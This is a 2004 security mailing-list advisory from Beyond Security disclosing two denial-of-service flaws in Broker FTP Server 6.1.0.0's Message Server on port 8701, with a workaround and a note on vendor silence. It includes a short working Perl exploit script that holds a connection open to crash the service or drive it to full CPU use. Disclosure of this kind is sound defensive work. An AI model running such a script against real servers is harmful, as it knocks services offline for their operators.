[VulnWatch] Broker FTP DoS (Message Server)q?=

From: Aviram Jenik (aviram_at_beyondsecurity.com)
Date: 02/17/04

  • Next message: exocet_at_exocet-industries.cx: "[VulnWatch] Gallery v1.3x, v1.4.1x Remote Exploit"
    To: vulnwatch@vulnwatch.org
    Date: Tue, 17 Feb 2004 17:48:50 +0200
    
    

      Broker FTP DoS (Message Server)
    ------------------------------------------------

    Article reference:
    http://www.securiteam.com/windowsntfocus/5IP0B0AC1I.html

    SUMMARY

    Beyond Security's SecurITeam has discovered two security vulnerabilities
    in the Broker FTP product, these vulnerabilities allow a remote attacker
    to repeatedly crash the TsFtpSrv.exe (The FTP Service) and to cause it to
    use large amount of CPU time.

    DETAILS

    Affected version:
     * Broker FTP Server version 6.1.0.0

    By connecting and immediately disconnecting to the Broker FTP server's
    Message Server (by default residing on port 8701) it is possible to cause
    an exception in the TsFtpSrv.exe program. The exception doesn't cause any
    harm beside showing a message that the TsFtpSrv.exe has encountered an
    Application Error.

    By connecting and not sending anything (but keeping the connection open),
    it is possible to cause the TsFtpSrv.exe to utilize large amount of CPU
    time (basically while the connection is kept open, CPU usage will be
    100%).

    Workaround:
    It is not clear what the Message Server is used for, but modifying the
    TsFtpSrv.ini's [TSMessageServer] allows an administrator to control what
    port the server listens on (and change it from the default one).

    Exploit:
    #!/usr/bin/perl -w
    # TransSoft Broker FTP Server DoS (CPU usage and Exception)
    #

    use Socket;
    if (not $ARGV[0]) {
            print qq~
                    Usage: pfdos.pl < host>
            ~;
    exit;}

    $ip=$ARGV[0];
    print "host: " . $ip . "\n\n";
    sendexplt("A");
    sub sendexplt {
     my ($pstr)=@_;
            $target= inet_aton($ip) || die("inet_aton
    problems");
     socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')
    ||0) ||
     die("Socket problems\n");
     if(connect(S,pack "SnA4x8",2,8701,$target)){
     select(S);
                    $|=1;
     print $pstr;
     sleep 100;
             close(S);
     } else { die("Can't connect...\n"); }
    }

    Vendor Status:
    We have tried to contact the vendor over a month ago, but have not received
    any response as of yet.

    ADDITIONAL INFORMATION

    The information has been provided by  <mailto:expert@securiteam.com>
    SecurITeam.

    -- 
    Beyond Security Ltd.
    "Know that you're safe"
    http://www.BeyondSecurity.com
    http://www.SecuriTeam.com
    ==================== 
    ==================== 
    DISCLAIMER: 
    The information in this bulletin is provided "AS IS" without warranty of any 
    kind. 
    In no event shall we be liable for any damages whatsoever including direct, 
    indirect, incidental, consequential, loss of business profits or special 
    damages. 
    

  • Next message: exocet_at_exocet-industries.cx: "[VulnWatch] Gallery v1.3x, v1.4.1x Remote Exploit"

    Relevant Pages

    • [Full-Disclosure] Broker FTP DoS (Message Server)q?=
      ... Broker FTP DoS ... Beyond Security's SecurITeam has discovered two security vulnerabilities ... Message Server it is possible to cause ... By connecting and not sending anything, ...
      (Full-Disclosure)
    • Broker FTP DoS (Message Server)q?=
      ... Broker FTP DoS ... Beyond Security's SecurITeam has discovered two security vulnerabilities ... Message Server it is possible to cause ... By connecting and not sending anything, ...
      (Bugtraq)